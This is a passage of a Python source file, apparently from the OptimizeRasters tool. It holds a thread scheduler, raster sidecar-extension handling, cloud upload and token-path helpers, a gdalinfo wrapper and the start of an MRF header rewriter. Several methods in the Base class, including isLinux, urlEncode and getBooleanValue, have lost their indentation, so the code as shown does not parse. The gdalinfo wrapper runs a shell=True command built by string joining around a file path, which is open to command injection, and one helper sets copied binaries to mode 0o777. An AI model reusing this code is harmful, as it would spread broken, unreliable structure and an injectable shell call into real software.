                alive = [t.is_alive() for t in threads]
                countDead = sum(not x for x in alive)
                if (countDead):
                    lenBuffer = countDead
                    threads = [t for t in threads if t.is_alive()]
                    break
            buffer = []
            for i in range(0, lenBuffer):
                if (workers == maxWorkers):
                    break
                buffer.append(self.work[workers])
                workers += 1
            if (not buffer and
                    not threads):
                break  # everything scheduled and finished.
            for f in buffer:
                try:
                    t = self.function(self.kwargs)
                    isJobID = self.JobID in f
                    if (not t.init(f[self.Job], f[self.JobID] if isJobID else 0)):
                        return False
                    t.daemon = True
                    if (isJobID):
                        self.message('Started/{}'.format(f[self.JobID]))
                    t.start()
                    threads.append(t)
                except Exception as e:
                    self.message(str(e))
                    continue
        if (self.base is not None):
            # NOTE: (CCFG_LAMBDA_INVOCATION_ERR) is defined elsewhere in this file.
            if (self.base.getUserConfiguration.getValue(CCFG_LAMBDA_INVOCATION_ERR)):
                self._isErrorDetected = True
                return False
        return True
class RasterAssociates(object):
    """Maps primary raster extensions to the ';' separated list of related
    (sidecar) extensions that must travel with them."""

    # ancillary files that may be discarded next to a raster-proxy output.
    RasterAuxExtensions = ['.lrc', '.idx', '.pjg', '.ppng', '.pft', '.pjp',
                           '.pzp', '.tif.cog.pzp', '.tif.cog.idx', '.tif.cogtiff.aux.xml']

    def __init__(self):
        self._info = {}

    def _stripExtensions(self, relatedExts):
        # normalize a ';' delimited list: trim blanks, drop empty tokens.
        tokens = (token.strip() for token in relatedExts.split(';'))
        return ';'.join(token for token in tokens if token)

    # relatedExts can be a ';' delimited list.
    def addRelatedExtensions(self, primaryExt, relatedExts):
        """Associate *relatedExts* with each ';' separated primary extension.
        Returns False when either argument is missing/blank."""
        if (not primaryExt or
                not primaryExt.strip() or
                not relatedExts):
            return False
        for token in primaryExt.split(';'):
            key = token.strip()
            if (not key):
                continue
            addition = self._stripExtensions(relatedExts)
            if (key in self._info):
                # append to an existing association.
                self._info[key] = '{};{}'.format(self._info[key], addition)
            else:
                self._info[key] = addition
        return True

    @staticmethod
    def removeRasterProxyAncillaryFiles(inputPath):
        # remove ancillary extension files that are no longer required for (rasterproxy) files on the client side.
        refBasePath = inputPath[:-len(CONST_OUTPUT_EXT)]
        errorEntries = []
        for ext in RasterAssociates.RasterAuxExtensions:
            candidate = refBasePath + ext
            try:
                if (not os.path.exists(candidate)):
                    continue
                if (candidate.endswith(COGTIFFAuxFile)):
                    # keep the aux.xml; just drop the '.cogtiff' marker.
                    os.rename(candidate, candidate.replace(CloudOGTIFFExt, ''))
                    continue
                os.remove(candidate)
            except Exception as e:
                errorEntries.append('{}'.format(str(e)))
        return errorEntries

    @staticmethod
    def findExtension(path):
        """Return the full (possibly compound, e.g. 'tar.gz') extension of
        *path*; False for an empty path, None when it has no '.' at all."""
        if (not path):
            return False
        ext = None
        dot = path.rfind('.')
        while (dot != -1):
            ext = path[dot + 1:]
            dot = path[:dot].rfind('.')
        return ext

    def findPrimaryExtension(self, relatedExt):
        """Reverse lookup: the primary extension a related file belongs to.
        None when not found; False on unusable input."""
        probe = self.findExtension(relatedExt)
        if (not probe):
            return False
        for primary, related in self._info.items():
            if (related.find(probe) != -1 and
                    probe in related.split(';')):
                return primary
        return None

    def getInfo(self):
        """Expose the primary -> related-extensions mapping."""
        return self._info
class Base(object):
    """Shared plumbing for the OptimizeRasters components: message routing,
    user-configuration access and small path/format helpers."""
    # log status types enums
    const_general_text = 0
    const_warning_text = 1
    const_critical_text = 2
    const_status_text = 3
    # ends

    def __init__(self, msgHandler=None, msgCallback=None, userConfig=None):
        self._m_log = msgHandler            # log handler (Message/WriteLog API).
        self._m_msg_callback = msgCallback  # optional UI callback.
        self._m_user_config = userConfig    # shared configuration store.
        self._lastMsg = ''
        if (self._m_msg_callback):
            if (self._m_log):
                # a UI callback takes over console output from the logger.
                self._m_log.isPrint = False

    def init(self):
        """(Re)initialize per-run state; always returns True."""
        self.hashInfo = {}                  # per-folder hash-token cache.
        self.timedInfo = {'files': []}      # per-file timings (see TimeIt).
        self._modifiedProxies = []
        return True
    def message(self, msg, status=const_general_text):
        """Route *msg* (with a const_*_text *status*) to the log handler
        and/or the UI callback; remembers the last non-empty message."""
        if (msg):
            self._lastMsg = msg
        if (self._m_log):
            self._m_log.Message(msg, status)
        if (self._m_msg_callback):
            self._m_msg_callback(msg, status)
def isLinux(self):
return sys.platform.lower().startswith(('linux', 'darwin'))
    def convertToTokenPath(self, inputPath, direction=CS3STORAGE_IN):
        """Rewrite *inputPath* into a secured cloud-handler path when token
        based access is enabled for the given transfer *direction*.
        Returns None/unmodified-None when tokens don't apply."""
        if (not inputPath):
            return None
        tokenPath = None
        if (direction == CS3STORAGE_IN):
            if (not self.getBooleanValue(self.getUserConfiguration.getValue(UseToken))):
                return tokenPath
        else:
            if (not self.getBooleanValue(self.getUserConfiguration.getValue(UseTokenOnOuput))):
                return tokenPath
        if (self.getBooleanValue(self.getUserConfiguration.getValue('iss3' if direction == CS3STORAGE_IN else CCLOUD_UPLOAD))):
            # NOTE: (getSecuredCloudHandlerPrefix) is defined elsewhere in this class.
            cloudHandler = self.getSecuredCloudHandlerPrefix(direction)
            if (not cloudHandler):
                return None
            currPrefix = self.getUserConfiguration.getValue(
                CIN_S3_PREFIX if direction == CS3STORAGE_IN else COUT_VSICURL_PREFIX, False)
            if (direction == CS3STORAGE_OUT):
                # trim the prefix at the job's output root. NOTE: relies on
                # the module-level (_rpt) resume reporter being initialized.
                currPrefix = currPrefix[:currPrefix.find(
                    _rpt._header['output'])]
            tokenPath = inputPath.replace(currPrefix,
                                          '/{}/{}/'.format(cloudHandler, self.getUserConfiguration.getValue('In_S3_Bucket' if direction == CS3STORAGE_IN else 'Out_S3_Bucket', False)))
        return tokenPath
    def copyBinaryToTmp(self, binarySrc, binaryDst):
        """Copy a binary to the (lambda) work area if it isn't there yet;
        returns False when the copy/chmod fails."""
        if (not os.path.exists(binaryDst)):
            try:
                shutil.copyfile(binarySrc, binaryDst)
                os.chmod(binaryDst, 0o777)  # set (rwx) to make lambda work.
                self.message('**LAMBDA** Copied -> {}'.format(binarySrc))
            except Exception as e:
                self.message(str(e), self.const_critical_text)
                return False
        return True
    def convertToForwardSlash(self, input, endSlash=True):
        """Normalize a path to forward slashes; optionally ensure a trailing
        '/' for folder-like inputs. Returns None for an empty input."""
        if (not input):
            return None
        _input = input.replace('\\', '/').strip()
        if (not endSlash):
            return _input
        f, e = os.path.splitext(_input)
        if (len(e) > 0):
            # looks like a file: keep as-is when the extension matches a known
            # raster/csv type. NOTE: (filterPaths) and (CCFG_RASTERS_NODE) are
            # defined elsewhere in this file.
            if (filterPaths(_input, self.getUserConfiguration.getValue(CCFG_RASTERS_NODE) + ['csv', 'CSV'])):
                return _input
        if (_input.lower().startswith('http://') or
                _input.lower().startswith('https://')):
            return _input
        if (not _input.endswith('/')):
            _input += '/'
        return _input
def insertUserTextToOutputPath(self, path, text, pos):
if (not path):
return None
if (not text):
return path
try:
_pos = int(pos)
except BaseException:
_pos = CHASH_DEF_INSERT_POS
_path = path.split('/')
_pos -= 1
lenPath = len(_path)
if (_pos >= lenPath):
_pos = lenPath - 1
p = os.path.dirname(path)
if (p not in self.hashInfo):
if (text == CHASH_DEF_CHAR):
text = binascii.hexlify(os.urandom(4))
else:
m = hashlib.md5()
m.update('{}/{}'.format(p, text))
text = m.hexdigest()
text = '{}_@'.format(text[:8]) # take only the fist 8 chars
self.hashInfo[p] = text
else:
text = self.hashInfo[p]
_path.insert(_pos, text)
return '/'.join(_path)
def urlEncode(self, url):
if (not url):
return ''
_url = url.strip().replace('\\', '/')
_storePaths = []
for path in _url.split('/'):
if (path.find(':') != -1):
_storePaths.append(path)
continue
data = {'url': path}
encoded = urlencode(data)
_storePaths.append(encoded.split('=')[1])
return '/'.join(_storePaths)
def getBooleanValue(self, value): # helper function
if (value is None):
return False
if (isinstance(value, bool)):
return value
val = value
if (not isinstance(val, str)):
val = str(val)
val = val.lower()
if val in ['true', 'yes', 't', '1', 'y']:
return True
return False
    @property
    def getUserConfiguration(self):
        """The shared user-configuration store (may be None)."""
        return self._m_user_config

    @property
    def getMessageHandler(self):
        """The log/message handler instance (may be None)."""
        return self._m_log

    @property
    def getMessageCallback(self):
        """The optional UI message callback (may be None)."""
        return self._m_msg_callback
    def close(self):
        """Flush the collected log entries to disk (skipped when running
        inside AWS Lambda, where the log folder isn't persisted)."""
        if (self._m_log):
            if (not CRUN_IN_AWSLAMBDA):
                usrLogFolder = self.getUserConfiguration.getValue(CFGLogPath)
                if (usrLogFolder is not None):
                    self._m_log.SetLogFolder(usrLogFolder)
                # persist information/errors collected.
                self._m_log.WriteLog('#all')
    def renameMetaFileToMatchRasterExtension(self, metaFile):
        """Map a multi-extension meta file name onto the '.mrf' output
        extension, unless 'KeepExtension' is configured."""
        updatedMetaFile = metaFile
        if (self.getUserConfiguration and
                not self.getBooleanValue(self.getUserConfiguration.getValue('KeepExtension'))):
            rasterExtension = RasterAssociates().findExtension(updatedMetaFile)
            if (not rasterExtension):
                return metaFile
            inputExtensions = rasterExtension.split('.')
            firstExtension = inputExtensions[0]
            # no changes to extension if the input has only one extension.
            if (len(inputExtensions) == 1):
                return metaFile
            # only rename when the leading extension is a recognized raster
            # type. NOTE: (CCFG_RASTERS_NODE) is defined elsewhere in this file.
            if (True in [firstExtension.endswith(x) for x in self.getUserConfiguration.getValue(CCFG_RASTERS_NODE)]):
                updatedMetaFile = updatedMetaFile.replace(
                    '.{}'.format(firstExtension), '.mrf')
        return updatedMetaFile
    def _isRasterProxyFormat(self, uFormat):
        """True when *uFormat* (case-insensitive) matches the configured
        raster-proxy format ('rpformat')."""
        if (not uFormat):
            return False
        rpFormat = self.getUserConfiguration.getValue('rpformat')
        return rpFormat == uFormat.lower()
    def copyMetadataToClonePath(self, sourcePath):
        """Mirror a generated metadata file into the configured clone path
        ('clonepath'); True when nothing needs doing or the copy succeeds."""
        if (not self.getUserConfiguration):
            return False
        _clonePath = self.getUserConfiguration.getValue(CCLONE_PATH, False)
        if (not _clonePath):
            return True  # not an error.
        if (self._isRasterProxyFormat('csv')):
            return True  # not an error.
        # NOTE: (CCFG_PRIVATE_OUTPUT) is defined elsewhere in this file.
        presentMetaLocation = self.getUserConfiguration.getValue(
            CCFG_PRIVATE_OUTPUT, False)
        if (self.getUserConfiguration.getValue(CTEMPOUTPUT) and
                self.getBooleanValue(self.getUserConfiguration.getValue(CCLOUD_UPLOAD))):
            # cloud uploads stage their outputs in the temp-output folder.
            presentMetaLocation = self.getUserConfiguration.getValue(
                CTEMPOUTPUT, False)
        _cloneDstFile = sourcePath.replace(presentMetaLocation, _clonePath)
        _cloneDirs = os.path.dirname(_cloneDstFile)
        try:
            if (not os.path.exists(_cloneDirs)):
                # NOTE: (makedirs) is a module-level helper defined elsewhere
                # in this file (not os.makedirs).
                makedirs(_cloneDirs)
            if (sourcePath != _cloneDstFile):
                shutil.copyfile(sourcePath, _cloneDstFile)
        except Exception as e:
            self.message(str(e), self.const_critical_text)
            return False
        return True
    def S3Upl(self, input_file, user_args, **kwargs):
        """Upload (input_file) and its sibling output files to the configured
        cloud store (Amazon / Azure / Google), then optionally delete the
        local copies when (user_args[USR_ARG_DEL]) is set.

        Returns True only when at least one file was uploaded (or when the
        resume report already marks the source as uploaded).
        Depends on module globals initialized elsewhere: _rpt, S3_storage,
        azure_storage, google_storage, til.
        """
        global _rpt
        internal_err_msg = 'Internal error at [S3Upl]'
        # argument sanity: (user_args), when given, must be a dict.
        if (not self._m_user_config or
            (user_args and
             not isinstance(user_args, dict))):
            self.message(internal_err_msg, self.const_critical_text)
            return False
        _source_path = None
        if (_rpt):
            # skip files the resume/.orjob report already marks as uploaded.
            _source_path = getSourcePathUsingTempOutput(input_file)
            if (_source_path):
                _ret_val = _rpt.getRecordStatus(_source_path, CRPT_UPLOADED)
                if (_ret_val == CRPT_YES):
                    return True
        ret_buff = []  # files successfully uploaded.
        upload_cloud_type = self._m_user_config.getValue(COUT_CLOUD_TYPE, True)
        if (upload_cloud_type == CCLOUD_AMAZON):
            if (S3_storage is None):  # globally declared: S3_storage
                self.message(internal_err_msg, self.const_critical_text)
                return False
            _single_upload = _include_subs = False  # def
            if (user_args):
                if (CSIN_UPL in user_args):
                    _single_upload = self.getBooleanValue(user_args[CSIN_UPL])
                if (CINC_SUB in user_args):
                    _include_subs = self.getBooleanValue(user_args[CINC_SUB])
            # S3 path uploads the whole group (raster + side-car files) in one call.
            ret_buff = S3_storage.upload_group(
                input_file, single_upload=_single_upload, include_subs=_include_subs)
            if (len(ret_buff) == 0):
                return False
        elif (upload_cloud_type == CCLOUD_AZURE):
            if(azure_storage is None):
                self.message(internal_err_msg, self.const_critical_text)
                return False
            properties = {
                CTEMPOUTPUT: self._m_user_config.getValue(CTEMPOUTPUT, False),
                'access': self._m_user_config.getValue(COUT_AZURE_ACCESS, True),
                CTEMPINPUT: self._m_user_config.getValue(CTEMPINPUT, False)
            }
            if (TarGz in kwargs):
                properties[TarGz] = kwargs[TarGz]
            # upload every sibling that shares the input's file-name prefix
            # (prefix = name up to the first '.').
            _input_file = input_file.replace('\\', '/')
            (p, n) = os.path.split(_input_file)
            indx = n.find('.')
            file_name_prefix = n
            if (indx >= 0):
                file_name_prefix = file_name_prefix[:indx]
            input_folder = os.path.dirname(_input_file)
            for r, d, f in os.walk(input_folder):
                r = r.replace('\\', '/')
                if (r == input_folder):
                    for _file in f:
                        if (_file.startswith('{}.'.format(file_name_prefix))):
                            file_to_upload = os.path.join(r, _file)
                            if (azure_storage.upload(
                                file_to_upload,
                                self._m_user_config.getValue(
                                    COUT_AZURE_CONTAINER, False),
                                self._m_user_config.getValue(
                                    CCFG_PRIVATE_OUTPUT, False),
                                properties, name=_source_path, method=TimeIt.Upload, store=self
                            )):
                                ret_buff.append(file_to_upload)
                    break
        elif (upload_cloud_type == Store.TypeGoogle):
            if(google_storage is None):
                self.message(internal_err_msg, self.const_critical_text)
                return False
            properties = {
                CTEMPOUTPUT: self._m_user_config.getValue(CTEMPOUTPUT, False),
                'access': self._m_user_config.getValue(COUT_AZURE_ACCESS, True)
            }
            # same prefix-based sibling scan as the Azure branch above.
            _input_file = input_file.replace('\\', '/')
            (p, n) = os.path.split(_input_file)
            indx = n.find('.')
            file_name_prefix = n
            if (indx >= 0):
                file_name_prefix = file_name_prefix[:indx]
            input_folder = os.path.dirname(_input_file)
            for r, d, f in os.walk(input_folder):
                r = r.replace('\\', '/')
                if (r == input_folder):
                    for _file in f:
                        if (_file.startswith('{}.'.format(file_name_prefix))):
                            file_to_upload = self.convertToForwardSlash(
                                os.path.join(r, _file), False)
                            if (google_storage.upload(
                                file_to_upload,
                                self._m_user_config.getValue(
                                    COUT_GOOGLE_BUCKET, False),
                                self._m_user_config.getValue(
                                    CCFG_PRIVATE_OUTPUT, False),
                                properties
                            )):
                                ret_buff.append(file_to_upload)
                    break
        if (CS3_MSG_DETAIL):
            self.message('Following file(s) uploaded to ({})'.format(
                upload_cloud_type.capitalize()))
            [self.message('{}'.format(f)) for f in ret_buff]
        if (user_args):
            if (USR_ARG_DEL in user_args):
                # NOTE(review): both operands of the 'and' below are identical;
                # the second was presumably meant to be a getBooleanValue()
                # check on the flag — confirm against upstream.
                if (user_args[USR_ARG_DEL] and
                        user_args[USR_ARG_DEL]):
                    # When the raster-proxy output is a single .csv, copy
                    # .aux.xml side-cars next to the proxy before deleting.
                    isProxyCSV = False
                    rpt = self.getUserConfiguration.getValue(CPRT_HANDLER)
                    if (rpt):
                        proxyPath = rpt._header.get(CRASTERPROXYPATH)
                        tmpOutput = rpt._header.get(CTEMPOUTPUT)
                        if (proxyPath and
                                tmpOutput and
                                proxyPath[-4:].lower().endswith('.csv')):
                            isProxyCSV = True
                    for f in ret_buff:
                        try:
                            _is_remove = True
                            # TIL members must stay on disk until the whole
                            # TIL group is processed.
                            if (til):
                                if (til.fileTILRelated(f)):
                                    _is_remove = False
                            if (_is_remove):
                                try:
                                    if (isProxyCSV):
                                        if (f.lower().endswith('.aux.xml')):
                                            dstAuxPath = os.path.join(os.path.dirname(proxyPath), os.path.basename(f))
                                            self.message('Copying {} -> {}'.format(f, dstAuxPath))
                                            shutil.copyfile(f, dstAuxPath)  # GH 104
                                    os.remove(f)
                                except BaseException:
                                    # retry once after a short delay (file may
                                    # still be locked by the uploader).
                                    time.sleep(CDEL_DELAY_SECS)
                                    os.remove(f)
                                self.message('[Del] %s' % (f))
                        except Exception as e:
                            self.message('[Del] Err. (%s)' %
                                         (str(e)), self.const_critical_text)
        if (ret_buff):
            # flag the source record as uploaded in the resume report.
            Input = 'input'
            setUploadRecordStatus(
                kwargs[Input] if kwargs and Input in kwargs else input_file, CRPT_YES)
        return (len(ret_buff) > 0)
def getSecuredCloudHandlerPrefix(self, direction):
warningMsg = 'getSecuredCloudHandlerPrefix/{} is false'.format(
'-usetoken' if direction == CS3STORAGE_IN else 'internal/usetokenonoutput')
if (direction == CS3STORAGE_IN and
not self.getBooleanValue(self.getUserConfiguration.getValue(UseToken))):
self.message(warningMsg, self.const_warning_text)
return None
if (direction == CS3STORAGE_OUT and
not self.getBooleanValue(self.getUserConfiguration.getValue(UseTokenOnOuput))):
self.message(warningMsg, self.const_warning_text)
return None
storageType = self.getUserConfiguration.getValue(
COUT_CLOUD_TYPE if direction == CS3STORAGE_OUT else CIN_CLOUD_TYPE, True)
prefix = 'vsis3'
usingOSSDomain = self.getUserConfiguration.getValue('{}oss'.format(
'in' if direction == CS3STORAGE_IN else 'out')) # alibaba?
if (usingOSSDomain):
prefix = 'vsioss'
elif (storageType == CCLOUD_AZURE):
prefix = 'vsiaz'
elif (storageType == CCLOUD_GOOGLE):
prefix = 'vsigs'
return prefix
class GDALInfo(object):
    """Thin wrapper around the 'gdalinfo' command-line tool: runs it on a
    raster and exposes the parsed width/height, band info and a suggested
    pyramid-level string.
    """
    CGDAL_INFO_EXE = 'gdalinfo'
    CW = 'width'
    CH = 'height'
    def __init__(self, base, msgCallback=None):
        # _GDALPath: resolved path to the gdalinfo executable (set by init()).
        self._GDALPath = None
        # _GDALInfo: raw stdout lines (bytes) captured from the last run.
        self._GDALInfo = []
        self._propertyNames = [self.CW, self.CH]
        self._base = base
        self._m_msg_callback = msgCallback
    def init(self, GDALPath):
        """Resolve and validate the gdalinfo executable under (GDALPath).
        Returns True on success.
        NOTE(review): 'self.CGDAL_INFO_EXE += CEXEEXT' below creates an
        instance attribute shadowing the class constant; calling init() twice
        on the same instance on Windows would append the extension twice —
        confirm callers only init() once.
        """
        if (not GDALPath):
            return False
        if (self._base and
                not isinstance(self._base, Base)):
            return False
        if (not self._base.isLinux()):
            self.CGDAL_INFO_EXE += CEXEEXT
        self._GDALPath = GDALPath.replace('\\', '/')
        if (not self._GDALPath.endswith('/{}'.format(self.CGDAL_INFO_EXE))):
            self._GDALPath = os.path.join(
                self._GDALPath, self.CGDAL_INFO_EXE).replace('\\', '/')
        # check for path existence / e.t.c
        if (not os.path.exists(self._GDALPath)):
            self.message('Invalid GDALInfo/Path ({})'.format(self._GDALPath),
                         self._base.const_critical_text)
            return False
        if (CRUN_IN_AWSLAMBDA):
            # lambda can only execute binaries from /tmp.
            _gdalinfo = '/tmp/{}'.format(self.CGDAL_INFO_EXE)
            if (not self._base.copyBinaryToTmp(self._GDALPath, _gdalinfo)):
                return False
            self._GDALPath = _gdalinfo
        for p in self._propertyNames:  # init-property names
            setattr(self, p, None)
        return True
    def process(self, input):
        """Run gdalinfo on (input) and capture its output; returns True when
        any output was collected."""
        if (not self._GDALPath):
            self.message('Not initialized!', self._base.const_critical_text)
            return False
        if (not input):  # invalid input
            return False
        args = [self._GDALPath]
        args.append('"{}"'.format(input))
        self.message('Using GDALInfo ({})..'.format(
            input), self._base.const_general_text)
        return self._call_external(args)
    def message(self, msg, status=0):
        # route through the user callback when one was supplied; otherwise
        # fall back to the base logger.
        self._m_msg_callback(
            msg, status) if self._m_msg_callback else self._base.message(msg, status)
    @property
    def bandInfo(self):
        """Return the captured 'Band ...' lines (decoded), or None if
        process() hasn't produced output."""
        if (not len(self._GDALInfo)):
            return None
        retInfo = []
        for v in self._GDALInfo:
            if (isinstance(v, bytes)):
                v = bytes.decode(v)
            if (v.startswith('Band ')):
                retInfo.append(v)
        return retInfo
    @property
    def pyramidLevels(self):
        """Return a space-separated descending list of pyramid factors (e.g.
        '8 4 2') derived from the raster's larger dimension and the configured
        BlockSize; '2' at minimum. Returns False if process() wasn't called."""
        if (not self.width or
                not self.height):
            return False  # fn/process not called.
        _max = max(self.width, self.height)
        _BS = CCFG_BLOCK_SIZE  # def (512)
        if (self._base.getUserConfiguration):
            __BS = self._base.getUserConfiguration.getValue('BlockSize')
            if (__BS):
                try:
                    _BS = int(__BS)  # catch invalid val types
                except BaseException:
                    pass
        # NOTE(review): '/' is true division on Python 3, so _value is a
        # float; math.log/ceil below still behave as intended for positive
        # sizes — confirm against the original Python 2 semantics.
        _value = (_max / _BS)
        if (_value <= 0):
            return ''
        _levels = int(2 ** math.ceil(math.log(_value, 2)))
        CDEFPYRAMID_LEV = '2'
        _steps = ''
        # emit factors from the highest power of two down to 2.
        while (_levels >= 2):
            _steps = '{} {}'.format(_levels, _steps)
            _levels >>= 1
        _steps = _steps.strip()
        if (not _steps):
            _steps = CDEFPYRAMID_LEV
        self.message('<PyramidFactor> set to ({})'.format(
            _steps), self._base.const_general_text)
        return _steps
    def _call_external(self, args):
        """Spawn gdalinfo, scan stdout (bytes) for the 'Size is W, H' line to
        populate width/height, and keep all stripped lines in _GDALInfo."""
        p = subprocess.Popen(' '.join(args), shell=True,
                             stdout=subprocess.PIPE)
        message = '/'
        CSIZE_PREFIX = b'Size is'
        while (message):
            message = p.stdout.readline()
            if (message):
                _strip = message.strip()
                if (_strip.find(CSIZE_PREFIX) != -1):
                    wh = _strip.split(CSIZE_PREFIX)
                    if (len(wh) > 1):
                        wh = wh[1].split(b',')
                        if (self.CW in self._propertyNames):
                            self.width = int(wh[0].strip())
                        if (self.CH in self._propertyNames):
                            self.height = int(wh[1].strip())
                self._GDALInfo.append(_strip)
        return len(self._GDALInfo) > 0
class UpdateMRF:
    """Rewrites an MRF header file so its CachedSource/Source, DataFile and
    IndexFile entries point at the final (possibly cloud) output location —
    producing a 'raster proxy' usable from the -rasterproxypath/-clonepath."""
    def __init__(self, base=None):
        # all state is set by init(); chained assignment leaves everything None.
        self._mode = \
            self._cachePath = \
            self._input = \
            self._output = \
            self._homePath = \
            self._outputURLPrefix = None
        self._base = base
    def init(self, input, output, mode=None,
             cachePath=None, homePath=None, outputURLPrefix=None):
        """Validate arguments, derive the output mode from the user config and
        normalize all paths to forward slashes. Returns True on success."""
        if (not input or
                not output):
            return False
        if (not os.path.exists(output)):
            try:
                makedirs(output)
            except Exception as e:
                self._base.message(str(e), self._base.const_critical_text)
                return False
        if (input.rfind('.') == -1):
            return False
        if (self._base and
                not isinstance(self._base, Base)):
            return False
        self._or_mode = self._base.getUserConfiguration.getValue(
            'Mode')  # mode/output
        if (not self._or_mode):
            self._base.message('UpdateMRF> (Mode) not defined.',
                               self._base.const_critical_text)
            return False
        _type = self._or_mode.split('_')
        if (len(_type) > 1):
            self._or_mode = _type[0]
        # to trap modes (cachingmrf/clonemrf).
        if (self._or_mode.endswith('mrf')):
            self._or_mode = 'mrf'
        self._mode = mode
        self._input = self._convertToForwardSlash(input)
        self._output = self._convertToForwardSlash(output)
        self._cachePath = self._convertToForwardSlash(cachePath)
        self._homePath = self._convertToForwardSlash(homePath)
        self._outputURLPrefix = self._convertToForwardSlash(outputURLPrefix)
        return True
    def _convertToForwardSlash(self, input):
        # None-safe slash normalization.
        if (not input):
            return None
        return input.replace('\\', '/')
    def copyInputMRFFilesToOutput(self, doUpdate=True):
        """Copy every file sharing the input MRF's prefix to the output
        folder; the main .mrf is passed through update() instead of copied.
        Files with raster-aux extensions, '.ovr' and mode-suffix files are
        skipped. Returns False only when not initialized."""
        if (not self._input or
                not self._output):
            if (self._base):
                self._base.message('Not initialized!',
                                   self._base.const_critical_text)
            return False
        _prefix = self._input[:self._input.rfind('.')]
        input_folder = os.path.dirname(self._input)
        _resumeReporter = self._base.getUserConfiguration.getValue(
            CPRT_HANDLER)
        if (_resumeReporter and
                CRESUME_HDR_OUTPUT not in _resumeReporter._header):
            _resumeReporter = None
        rpformat = self._base.getUserConfiguration.getValue('rpformat')
        rpCSV = self._base._isRasterProxyFormat(rpformat)
        for r, d, f in os.walk(input_folder):
            r = r.replace('\\', '/')
            if (r == input_folder):
                for _file in f:
                    if (True in [_file.lower().endswith(x) for x in RasterAssociates.RasterAuxExtensions]):
                        continue
                    _mk_path = r + '/' + _file
                    if (_mk_path.startswith(_prefix)):
                        try:
                            _output_path = self._output
                            if (self._homePath):
                                # rebuild the relative sub-folder structure
                                # under the output path.
                                userInput = self._homePath
                                if (_resumeReporter):
                                    userInput = _resumeReporter._header[CRESUME_HDR_OUTPUT]
                                _output_path = os.path.join(self._output, os.path.dirname(self._input.replace(
                                    self._homePath if self._input.startswith(self._homePath) else userInput, '')))  #
                            if (not os.path.exists(_output_path)):
                                if (not rpCSV):
                                    makedirs(_output_path)
                            _mk_copy_path = os.path.join(
                                _output_path, _file).replace('\\', '/')
                            if (_file.lower() == os.path.basename(self._input).lower()):
                                # the main header goes through update(), not a
                                # plain copy.
                                if (doUpdate):
                                    if (not self.update(_mk_copy_path)):
                                        if (self._base):
                                            self._base.message('Updating ({}) failed!'.format(
                                                _mk_copy_path), self._base.const_critical_text)
                                continue
                            if (_mk_path.lower().endswith(self._or_mode) or
                                    _mk_path.lower().endswith('.ovr')):
                                continue
                            if (not os.path.exists(_mk_copy_path)):
                                if (not rpCSV):
                                    shutil.copy(_mk_path, _mk_copy_path)
                        except Exception as e:
                            if (self._base):
                                self._base.message(
                                    '-rasterproxypath/{}'.format(str(e)), self._base.const_critical_text)
                            continue
    def update(self, output, **kwargs):
        """Parse the input MRF/XML header and write an updated raster-proxy
        header to (output): injects/repoints CachedSource/Source, rewrites
        DataFile/IndexFile cache paths and applies cloud URL prefixes.
        Optional kwargs: 'trueInput' overrides the Source value.
        Returns True on success, False (with a logged message) on any error."""
        try:
            _CCACHE_EXT = '.mrf_cache'
            _CDOC_ROOT = 'MRF_META'
            comp_val = None  # for (splitmrf)
            isURLInput = self._input.lower().startswith(
                'http://') or self._input.lower().startswith('https://')
            baseURL = self._input
            if (isURLInput):
                baseURL = self._input.split('?')[0]
                baseURL = os.path.basename(baseURL)
            doc = minidom.parse(
                self._input if not isURLInput else urlopen(self._input))
            _rasterSource = self._input
            isCOGTIFF = self._base.getUserConfiguration.getValue('cog')
            autoCreateRasterProxy = False
            if (self._mode):
                autoCreateRasterProxy = not self._mode.endswith('mrf')
            if (self._outputURLPrefix and  # -cloudupload?
                    self._homePath):
                usrPath = self._base.getUserConfiguration.getValue(
                    CUSR_TEXT_IN_PATH, False)
                # default insert pos (sub-folder loc) for user text in output path
                usrPathPos = CHASH_DEF_INSERT_POS
                if (usrPath):
                    (usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
                _rasterSource = '{}{}'.format(
                    self._outputURLPrefix, _rasterSource.replace(self._homePath, ''))
                if (_rasterSource.startswith('/vsicurl/')):
                    # switch to a secured (token) GDAL handler when enabled.
                    isOutContainerSAS = False
                    if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseTokenOnOuput)) and
                            not self._base.getBooleanValue(self._base.getUserConfiguration.getValue('iss3'))):
                        cloudHandler = self._base.getSecuredCloudHandlerPrefix(
                            CS3STORAGE_OUT)
                        if (cloudHandler):
                            outContainer = self._base.getUserConfiguration.getValue(
                                'Out_S3_Bucket', False)
                            proxyURL = self._base.getUserConfiguration.getValue(
                                CCLONE_PATH, False)
                            proxySubfolders = output.replace(proxyURL, '')
                            proxyFileURL = os.path.join(self._base.getUserConfiguration.getValue(
                                CCFG_PRIVATE_OUTPUT, False), proxySubfolders)
                            isOutContainerSAS = (self._base.getUserConfiguration.getValue(COUT_CLOUD_TYPE, True) == CCLOUD_AZURE and
                                                 azure_storage is not None and
                                                 azure_storage._SASToken is not None)
                            _rasterSource = '/vsicurl/{}'.format(azure_storage._blob_service.url).replace('?', format('/{}?'.format(
                                proxyFileURL))) if isOutContainerSAS else '/{}/{}/{}'.format(cloudHandler, outContainer, proxyFileURL)
                            if (not isOutContainerSAS):
                                _rasterSource = self._base.urlEncode(_rasterSource)
                if (usrPath):
                    _idx = _rasterSource.find(
                        self._base.getUserConfiguration.getValue(CCFG_PRIVATE_OUTPUT, False))
                    if (_idx != -1):
                        suffix = self._base.insertUserTextToOutputPath(
                            _rasterSource[_idx:], usrPath, usrPathPos)
                        _rasterSource = _rasterSource[:_idx] + suffix
            # if -tempoutput is set, readjust the CachedSource/Source path to point to -output.
            else:
                if (self._base.getUserConfiguration.getValue(CTEMPOUTPUT) or
                        autoCreateRasterProxy):
                    _output = self._base.getUserConfiguration.getValue(
                        CCFG_PRIVATE_OUTPUT)
                    if (_output):
                        _rasterSource = _rasterSource.replace(
                            self._homePath, _output)
            nodeMeta = doc.getElementsByTagName(_CDOC_ROOT)
            nodeRaster = doc.getElementsByTagName('Raster')
            if (not nodeMeta or
                    not nodeRaster):
                raise Exception('Err. Invalid header')
            cachedNode = doc.getElementsByTagName('CachedSource')
            if (not cachedNode):
                # inject a CachedSource/Source node ahead of <Raster>.
                cachedNode.append(doc.createElement('CachedSource'))
                nodeSource = doc.createElement('Source')
                azSAS = self._base.getUserConfiguration.getValue(
                    CFGAZSASW, False)
                trueInput = _rasterSource
                if ('trueInput' in kwargs):
                    trueInput = kwargs['trueInput']
                nodeSource.appendChild(doc.createTextNode(
